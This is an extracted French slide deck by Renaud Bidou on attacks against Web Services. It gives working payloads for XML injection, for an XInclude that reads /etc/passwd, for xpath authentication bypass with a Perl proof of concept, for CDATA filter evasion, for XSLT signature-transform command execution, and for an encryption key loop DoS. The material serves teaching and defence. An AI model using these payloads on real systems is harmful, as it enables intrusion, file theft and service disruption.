Attaques sur les Web Services. Renaud Bidou



Documents pareils
Sécurité. Objectifs Gestion de PKI Signature Cryptage Web Service Security

Web Services : Beyond the peer-to-peer architecture

Responsable du cours : Héla Hachicha. Année Universitaire :

Urbanisation des SI Conduite du changement IT 20/03/09. Patrick CHAMBET

Le bon sens et l expérience

Sécurité des Web Services (SOAP vs REST)

XML et Sécurité. Didier DONSEZ. Université Joseph Fourier IMA IMAG/LSR/ADELE 'LGLHU'RQVH]#LPDJIU

4. SERVICES WEB REST 46

Implémentation libre de Liberty Alliance. Frédéric Péters

Le cadre des Web Services Partie 1 : Introduction

MINISTÈRE DES SOLIDARITÉ ET DE LA COHÉSION SOCIALE

Groupe Eyrolles, 2004, ISBN :

Architecture Orientée Service, JSON et API REST

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin

XML, PMML, SOAP. Rapport. EPITA SCIA Promo janvier Julien Lemoine Alexandre Thibault Nicolas Wiest-Million

Oauth : un protocole d'autorisation qui authentifie?

Vulnérabilités et sécurisation des applications Web

Les Services Web. Jean-Pierre BORG EFORT

Sécurité des applications web. Daniel Boteanu

Introduction aux. services web 2 / 2

ADMINISTRATION DE ADOBE LIVECYCLE MOSAIC 9.5

Programmation Web Avancée Introduction aux services Web

Architectures d'intégration de données

Supervision et infrastructure - Accès aux applications JAVA. Document FAQ. Page: 1 / 9 Dernière mise à jour: 15/04/12 16:14

Les Architectures Orientées Services (SOA)

Systèmes d'informations historique et mutations

Evolution et architecture des systèmes d'information, de l'internet. Impact sur les IDS. IDS2014, Nailloux 26-28/05/2014

DenyAll Protect. Sécurité & accélération. Parefeux pour applications et services Web. de vos applications.

Sécurisation des architectures traditionnelles et des SOA

Architecture JEE. Objectifs attendus. Serveurs d applications JEE. Architectures JEE Normes JEE. Systèmes distribués

Architectures de fédération d'identités et interopérabilité

BPEL Orchestration de Web Services

Shibboleth. David Verdin - JOSY "Authentification centralisée pour les applications web" - Paris - 4 février mai

Formation SSO / Fédération

Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement

Tour d horizon des différents SSO disponibles

Les technologies de gestion de l identité

SSH, le shell sécurisé

XML par la pratique Bases indispensables, concepts et cas pratiques (3ième édition)

SQL Parser XML Xquery : Approche de détection des injections SQL

Thierry BOULANGER. par la pratique. Bases indispensables Concepts et cas pratiques XML. 3 ième édition. Nouvelle édition

HAUTE DISPONIBILITÉ DE MACHINE VIRTUELLE AVEC HYPER-V 2012 R2 PARTIE CONFIGURATION OPENVPN SUR PFSENSE

Mysql. Les requêtes préparées Prepared statements

titre : CENTOS_CUPS_install&config Système : CentOs 5.7 Technologie : Cups Auteur : Charles-Alban BENEZECH

Sommaire. Introduction La technologie ebxml EDI conventionnels versus ebxml Web Services et ebxml Acteurs de l ebxml Conclusion

laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007

Nombre de pages : 76. Les termes relatifs au socle ENT inscrits dans ce document sont définis dans le glossaire référencé : SocleENT_Glossaire.

Sécurité des réseaux sans fil

Sécurité des réseaux wi fi

La Latecion protection anti-intrusion Web Web Le concept «Zero effort Security» La protection des applications Extranet

Introduction à Microsoft InfoPath 2010

DESCRIPTION DU COMPOSANT

Technologies du Web. Créer et héberger un site Web. Pierre Senellart. Page 1 / 26 Licence de droits d usage

Accès aux ressources informatiques de l ENSEEIHT à distance

Introduction aux «Services Web»

ABB personnalise son service client avec la plate-forme en ligne One ABB on the Web Jan Anders Solvik, Håkan Wärdell, Nathan Becker

Proposition d une architecture pour ebay, en mettant l accent sur les notions de scalabilité, de résilience, et de tolérance aux pannes.

SSL ET IPSEC. Licence Pro ATC Amel Guetat

Le protocole RADIUS Remote Authentication Dial-In User Service

Plateforme PAYZEN. Définition de Web-services

Web Services ADFS. Etudiant : Pellarin Anthony. Professeur : Litzistorf Gérald. En collaboration avec : Sogeti. Date du travail :

Présentation de la solution Open Source «Vulture» Version 2.0

1. Formation F5 - Local Traffic Manager Configuring (LTM)

Manuel d intégration API SOAP SMS ALLMYSMS.COM

Développer des Applications Internet Riches (RIA) avec les API d ArcGIS Server. Sébastien Boutard Thomas David

THEME PROJET D ELABORATION D UNE BASE DE DONNEES SOUS LE SERVEUR MYSQL

Sécurité des réseaux IPSec

FileMaker Server 11. Publication Web personnalisée avec XML et XSLT

De l Utilisation des VPNs pour l Administration et la Sécurité des Services Web

Manuel des logiciels de transferts de fichiers File Delivery Services

Business Process Execution Language

COMPRENDRE L ARCHITECTURE DES WEB SERVICES REST. Amosse EDOUARD, Doctorant

OZSSI NORD 4 JUIN LILLE. Conférence thématique: Sécurité des applications

Faculté de Génie Chaire industrielle en infrastructures de communication. La technologie XML. Wajdi Elleuch

CIBLE DE SECURITE CSPN DU PRODUIT PASS. (Product for Advanced SSO)

Supplément de renseignements : Examens d applications et pare-feux d applications web clarifiés Normes : Normes en matière de sécurité des données de

4. Utilisation d un SGBD : le langage SQL. 5. Normalisation

Urbanisation des Systèmes d'information

Intégration d'applications à "gros grain" Unité d'intégration : le "service" (interface + contrat)

Réseaux. Moyens de sécurisation. Plan. Evolutions topologiques des réseaux locaux

OWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI

Programme «Analyste Programmeur» Diplôme d état : «Développeur Informatique» Homologué au niveau III (Bac+2) (JO N 176 du 1 août 2003) (34 semaines)

CRYPTOGRAPHIE. Chiffrement par flot. E. Bresson. SGDN/DCSSI Laboratoire de cryptographie

Sécurisation d une application ASP.NET

ENVOLE 1.5. Calendrier Envole

Module BDWEB. Maîtrise d informatique Cours 9 - Xquery. Anne Doucet. anne.doucet@lip6.fr

WEBSERVICES. Michael Fortier. Master Informatique 2ème année. A308, Université de Paris 13

SQL MAP. Etude d un logiciel SQL Injection

Architectures Web Services RESTful

Introduction. aux architectures web. de Single Sign-On

Aurélien Bordes. OSSIR 13 juillet 2010

Les nouvelles architectures des SI : Etat de l Art

Gestion de tests et tests de performance avec Salomé-TMF & CLIF

EXALOGIC ELASTIC CLOUD MANAGEMENT

Accès réseau Banque-Carrefour par l Internet Version /06/2005

Alfstore workflow framework Spécification technique

Transcription:

Attaques sur les Web Services Renaud Bidou

Le monde merveilleux des Web Services

Que sont les Web Services? Définition du WoldWide Web Consortium (W3C) a software system designed to support interoperable machine-to-machine interaction over a network Web Services Automatisent les interractions entre mécanismes de traitement de données accroissent la rapidité des traitements métier facilitent l interconexion de systèmes hétérogènes

Histoire des Web Services Ancêtres RMI DCOM CORBA La famille WS-* Intégrée aux principaux frameworks Depuis 2002.NET 1.0 & J2EE 1.0 Promue par le W3C Standardisée par OASIS REST Representational state transfer IN PEACE OASIS? Organization for the Advancement of Structured Information Standards IBM, Microsoft, ORACLE, Sun

Histoire des Web Services Ancestors RMI DCOM CORBA WS-* family Intégrée auxprincipaux framewroks Depuis 2002.NET 1.0 & J2EE 1.0 Promue par le W3C Standardisée par OASIS REST Representational state transfer IN PEACE OASIS? Organization for the Advancement of Structured Information Standards IBM, Microsoft, ORACLE, Sun

Structure Besoins Opérationnels Fonctionnelle Applications répondent à composées de piloté par contrôlent Politiques Services Etats appliquent limités par échangent Contracts contiennent Schemas décrivent Messages

Structure Besoins Opérationnels Fonctionnelle Applications répondent à composées de piloté par contrôlent Politiques Services Etats appliquent limités par échangent Contracts contiennent Schemas décrivent Messages

Composants ❶ Acteurs des Web Services Utilisateurs : individus utilisant une interface d abstraction Requesters : Clients des Web Services Intermediary : capable de traiter une partie de la requête Providers : servent la requête ❷ Ressources Registres : fournissent la description et les points d accès Portail : Frontal des Requester pour les utilisateurs Communication : Basée entièrement sur SOAP ❸ Coordination Organise le traitement entre providers Orchestration : 1 service appelle les autres Chorégraphie : plusieurs services en appellent d autres

Exemple Portail de Web Service Web Service de l Usine Banque du client Construit Vérifie la solvabilité Cherche un crédit Cherche les taux www.newcar.com Organisme de Crédit Banque centrale

UDDI : Registres de Web Services Requester Où puis-je trouver le Service buildcar? L interface est à http://.../service.wsdl Registre UDDI Donne-moi l interface du service Fournit le résultat Appelle le service avec les paramètres appropriés Provider

Technologies Langage Transport XML + HTTP Description WSDL : Schema SAML : Security assertion XACML : Politique de sécurité XKMS : Gestion des clés Processing Messages SOAP xpath : Gestion des noeuds xquery : Extension relationnelle de xpath xpointer : Identification des parties d un document xlink : Hyperliens dans les documents

La sécurité dans les Web services

Security Trust relationships Standards Overview WS-Trust WS-Federation LibertyAlliance XKMS SAML SOAP WS-Security WS-Reliability XACML WS-Policy SAML Access XML XML Encryption XML Signature Implémentations les plus courantes HTTP TCP HTTP Auth SSL / TLS Sécurité habituelle des applications Web IP IPSec Deux acteurs principaux : W3C et le consortium OASIS Des dizaines de documents, standards et recommendations Des centaines de MAY, SHOULD, IS (STRONGLY) RECOMMANDED XML & HTTP : Deux standards des milliers de possibilités

XML Signature <XML> <Node> <Another Node> Content </Another Node> </Node> <Signature> <SignedInfo> <CanonicalizationMethod> <SignatureMethod> Eléments clé Permet de signer tout ou partie d un document XML Les éléments signés peuvent être internes ou externes au document Les données peuvent être transformées en amont des opérations <Reference> <Transforms> <DigestMethod> <DigestValue> <URI> <Reference> <Transforms> <DigestMethod> <DigestValue> <URI> <XML> <Outside Node> <Outside Another Node> Content </Outside Another Node> </Outside Node> <SignatureValue> <KeyInfo> <Objects>

XML Encryption Eléments clé Chiffre tout ou partie d un document XML Les clés de chiffrement peuvent être intégrées au document Chiffrées avec une clé Qui peut être chiffrée Clef de chiffrement Cipher <EncryptedData> <EncryptionMethod/> <ds:keyinfo> <EncryptedKey> <AgreementMethod> <ds:keyname> <ds:retrievalmethod> <ds:*> </ds:keyinfo> <CipherData> <CipherValue> <CipherReference URI?> </CipherData> <EncryptionProperties> </EncryptedData> Algorithme utilisé pour le chifferment La clef est chiffrée Block EncryptedData-like Mécanisme de récupération de la clef Reference aux données chiffrées (peuvent être dans un autre document)

WS-Security WS-Security Nouvel en-tête + XML Signature (avec quelques limitations) + XML Encryption (avec des extensions additionnelles) + Security Tokens pour transporter des assertions Security Tokens Utilisés pour transporter les asertions des utilisateurs Essentiellement des informations d authentification Peut-être n importe quoi (données de sessions, cerrificats etc.) WS-Security ne précise pas comment valider les assertions

XACML & SAML SAML Security Assertion Markup Language Traite les assertions générées par XACML aux acteurs XACML extensible Access Control Markup Language Définit la politique d accès aux ressources Applique la politique Processus interne de délivrance du Visa Visa Utilisé pour accéder aux ressources

Un peu trop Authorisation en lecture Pour les utilisateurs du groupe developers Sur http://server.example.com/code/docs/guide

Attaques sur les Web Services

Principes des Injections XML Utilisées pour manipuler le contenu XML Généralement utilisés via l interface Web des portails Name: John Doe Email: john@doe.com Address: 1024 Mountain Street Zip: 17000 Frontal Web Name: John Doe Email: john@doe.com Address: 1024 Mountain Street Zip: 17000 ID: 100374 Role: User WS de gestion des comptes

Principes des Injections XML <UserRecord> <ID>100374</ID> <Role>User</Role> <Name>John Doe</Name> <Email>john@doe.com</Email><Role>Admin</Role><Email>john@doe.com</Email> <Address>1024 Mountain Street</Address> <Zip>17000</Zip> </UserRecord> User editable fields can be accessed via the Web interface through forms Injection overwrites the private <Role> element

Injection XML persistante Stockée sur le provider Exécutée par le serveur lorsque la requête est servie Stage 1: Injection Name: John Doe <xi:include href="file:///etc/passwd" parse="text"/> Email: john@doe.com Address: 1024 Mountain Street Zip: 17000 Frontal Web WS de gestion des comptes

Injection XML persistante Stockée sur le provider Exécutée par le serveur lorsque la requête est servie Name: John Doe root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh Email: john@doe.com Address: 1024 Mountain Street Zip: 17000 Name /etc/passwd ;-) Email Address Zip Stage 2: Execution Get my personal info Web Based Frontend WS de gestion des comptes

Dénis de Service Basé sur la complexité du document <a1> <a2> <a3> <a4> </a4> </a3> </a2> </a1> <a1000> </a1000> Opérations de traitement du document 2 étapes impactant la CPU puis la mémoire C:\Temp>perl xpath.pl dos1.xml //a1 Searching //a1 in dos1.xml... 1 found Out of memory! 1. Recherche CPU Memory 2. Stockage

Injection Via le Portail du DoS Directement sur le Service SOAP <soapenv:envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> <soapenv:header/> <soapenv:body> <tem:login> <tem:loginid> John Doe<a1>.</a1> </tem:loginid> <tem:password> muahahah </tem:password> </tem:login> </soapenv:body> </soapenv:envelope> HTML Login: John Doe <a1> </a1> Password: ******** Frontal Web WS de gestion des comptes

Evasion Le champ <![CDATA[]]> Utilisé pour autoriser le transport de tout type de données en XML Les données contenues dans un champ <![CDATA[]]> ne doivent pas être analysées ni traitées Elles sont retranscrites àl identique par le parser Frontal Web WS de gestion des comptes <SUPPORT_ENTRY> <EMAIL>john@due.com</EMAIL> <TEXT> <![CDATA[<S]]>CRIP<![CDATA[T>]]> alert(document.cookie); <![CDATA[</S]]>CRIP<![CDATA[T>]]> </TEXT> </SUPPORT_ENTRY> Inspection: Ok <SCRIPT> alert(document.cookie); </SCRIPT>

Injection xpath L équivalent de SQL Injection de données pour corrompre une expression xpath Nouvelle difficulté : pas de commentaires inline Exemple Authentification basée sur l expression: Injection //user[name='$login' and pass='$pass']/account/text() $login = whatever' or '1'='1' or 'a'='b $pass = whatever Exploitation de la précédence de l opérateur AND L expression devient //user[name='whatever' or '1'='1' or 'a'='b' and pass= whatever']/account/text() TRUE OR FALSE = TRUE

Injection xpath: PoC users.xml xpathauth.pl #!/usr/bin/perl use XML::XPath; use XML::XPath::XMLParser; my $login = $ARGV[0]; my $pass = $ARGV[1]; my $userfile = "users.xml"; my $expr = "//user[login=\'$login\' and pass=\'$pass\']"; my $xp = XML::XPath->new(filename => $userfile); my $nodeset = $xp->find($expr); if($nodeset->size) { print "Authentication successful\n"; } else { print "Authentication failed\n"; } <users> User List <user auth:type="admin"> <id>1</id> <name>administrator</name> <login>admin</login> <pass>admin</pass> </user> <user auth:type="user"> <id>1001</id> <name>renaud</name> <login>renaud</login> <pass>bidou</pass> </user> <!-- Looser --> <user auth:type="user" auth:comment="looser"> <id>1002</id> <name>hb</name> <login>hb</login> <pass>isback</pass> </user> <user auth:type="user"> <id>1003</id> <name>jean Bon</name> <login>jean</login> <pass>rigolo</pass> </user> <?PI your mother?> </users>

Injection xpath: PoC DEMO

Dump d un document XML L opérateur operator dans xpath Opérateur identique à UNION mais plus flexible Effectue des opérations séquentielles Exploite l absence de restrictions d accès aux parties d un document Utilisation dans une injection xpath Item description query via xpath: Inject //item[itemid= $id ]/description/text() $itemid = whatever ] /* //item[itemid= whatever Expression becomes //item[itemid= whatever ] /* //item[itemid= whatever ]/description/text() Matches all nodes Require prior knowledge of expression

Blind xpath Injection Les bases Publiée * par Amit Klein Permet de récupérer l intégralité d un document XML Sans connaissance de la structure de l expression xpath Mode opératoire 1. Trouver une injection standard 2. Replacer le prédicat 1 = 1 par une expression E dont le résultat est binaire 3. E est utilisé pour évaluer : Chaque bit du nom ou de la valeur d un élément Le nombre d éléments de chaque type (élément, texte, PI etc.) Contraintes Lent (à-la Brute Force) Démontré mais pas de PoC publiquement disponible * Blind xpath Injection Amit Klein - http://www.packetstormsecurity.org/papers/bypass/blind_xpath_injection_20040518.pdf

Blind Injection xpath : PoC DEMO

Attaques sur SOAP

DoS sur SOAP Techniques habituelles SOAP est généralement considéré comme HTTP + XML Vulnérable aux DoS IP/TCP/HTTP Très sensible aux floods applicatifs Rarement dimensionné pour traité des milliers de requêtes par seconde Vulnérable aux DoS XML Anomalies Jouer avec les en-têtes est une bonne idée Dépend des versions de SOAP supportées et de leur impélmentation Attachements SOAP SOAP peut transporter des données externes à sa structure XML Devient un message MIME multipart dont la première partie est de type text/xml Les gros attachements peuvent provoquer un épuiseme,t des ressources CPU/mémoire

Rejeu de messages SOAP SOAP ne gère pas les états SOAP est un protocole d échange de messages L implémente pas de mécanisme de suivi et de contrôle de session Il n y a pas de relation entre les messages Les messages peuvent être rejoués à volonté Scenarios de rejeu Rejeu de messages d authentification capturés Rejeu d actions (transfert financier, main gagnante au poker etc.) DoS

Attaques sur WS-Security

Exploitation de la transformation XSLT La transformation XSLT Explicitement identifiée dans XML Signature, mais optionnelle Fournit de puissantes fonctions de formatage avant signature Problème La plupart des impélmentations XSLT fournissent des appels système Le serveut peut être contraint à exécuter du code avant de valider la signature Publié * et démontré par Bradley W. Hill Utilisation avec XML encryption XML Encryption utilise des transformations dans les éléments <KeyInfo> et <RetrievalMethod> Même cause, même tarif * Command Injection in XML Signatures and Encryption Bradley W. Hill - http://www.isecpartners.com/files/xmldsig_command_injection.pdf

Transformation XSLT: PoC Code de transformation malicieux <Transforms> <Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/> <Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116"> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/xsl/transform" xmlns:rt=http://xml.apache.org/xalan/java/java.lang.runtime xmlns:ob="http://xml.apache.org/xalan/java/java.lang.object" exclude-result-prefixes= "rt,ob"> <xsl:template match="/"> <xsl:variable name="runtimeobject" select="rt:getruntime()"/> <xsl:variable name="command" select="rt:exec($runtimeobject,&apos;c:\windows\system32\cmd.exe&apos;)"/> <xsl:variable name="commandasstring" select="ob:tostring($command)"/> <xsl:value-of select="$commandasstring"/> </xsl:template> </xsl:stylesheet> </Transform> </Transforms>

Boucle de clefs de chiffrement Le bloc <EncryptedKey> Extension du type <EncryptedDataType> Contient un bloc <KeyInfo> Permet de référencer une clef externe via <RetrievalMethod> L ataque Clé A est chiffrée avec Clé B Clé B est référencée comme externe à l élément Clé B est chiffrée avec Clé A Clé A est référencée comme externe à l élément Identifiée dans le standards OASIS!!! Ne propose pas de solution ni de contournement Recommande uniquement de surveiller l utilisation des ressources

Boucle de clef de chiffrement: PoC <EncryptedKey Id='Key1' xmlns='http://www.w3.org/2001/04/xmlenc#'> <EncryptionMethod Algorithm='http://www.w3.org/2001/04/xmlenc#aes128-cbc'/> <ds:keyinfo xmlns:ds='http://www.w3.org/2000/09/xmldsig#'> <ds:retrievalmethod URI='#Key2'Type="http://www.w3.org/2001/04/xmlenc#EncryptedKey"/> <ds:keyname>no Way Out</ds:KeyName> </ds:keyinfo> <CipherData><CipherValue>DEADBEEF</CipherValue></CipherData> <ReferenceList> <DataReference URI='#Key2'/> </ReferenceList> <CarriedKeyName>I Said No Way</CarriedKeyName> </EncryptedKey> Avec Clé 2 Située Ici Chiffrée Clé 1 <EncryptedKey Id='Key2' xmlns='http://www.w3.org/2001/04/xmlenc#'> <EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#aes128-cbc"/> <ds:keyinfo xmlns:ds='http://www.w3.org/2000/09/xmldsig#'> <ds:retrievalmethod URI='#Key1' Type="http://www.w3.org/2001/04/xmlenc#EncryptedKey"/> <ds:keyname>i Said No Way</ds:KeyName> </ds:keyinfo> <CipherData><CipherValue>xyzabc</CipherValue></CipherData> <ReferenceList> <DataReference URI='#Key1'/> </ReferenceList> <CarriedKeyName>No Way Out</CarriedKeyName> </EncryptedKey>

Encryption Key Loop PoC <EncryptedKey Id='Key1' xmlns='http://www.w3.org/2001/04/xmlenc#'> <EncryptionMethod Algorithm='http://www.w3.org/2001/04/xmlenc#aes128-cbc'/> <ds:keyinfo xmlns:ds='http://www.w3.org/2000/09/xmldsig#'> <ds:retrievalmethod URI='#Key2'Type="http://www.w3.org/2001/04/xmlenc#EncryptedKey"/> <ds:keyname>no Way Out</ds:KeyName> </ds:keyinfo> <CipherData><CipherValue>DEADBEEF</CipherValue></CipherData> <ReferenceList> <DataReference URI='#Key2'/> </ReferenceList> <CarriedKeyName>I Said No Way</CarriedKeyName> </EncryptedKey> Clé 1 <EncryptedKey Id='Key2' xmlns='http://www.w3.org/2001/04/xmlenc#'> <EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#aes128-cbc"/> <ds:keyinfo xmlns:ds='http://www.w3.org/2000/09/xmldsig#'> <ds:retrievalmethod URI='#Key1' Type="http://www.w3.org/2001/04/xmlenc#EncryptedKey"/> <ds:keyname>i Said No Way</ds:KeyName> </ds:keyinfo> <CipherData><CipherValue>xyzabc</CipherValue></CipherData> <ReferenceList> <DataReference URI='#Key1'/> </ReferenceList> <CarriedKeyName>No Way Out</CarriedKeyName> </EncryptedKey> Avec Clé 1 Située Ici Chiffrée Clé 2

Conclusion

Conclusion Les Web Services sont là Inutile de discuter Ils sont partout Même là où vous l ignorez Ils sont vulnérables Et les vecteurs d attaque sont connus Les attaques sont connues Et déjà largement utilisées

Mais maintenant Vous savez Et çà fait toute la différence

Thank you!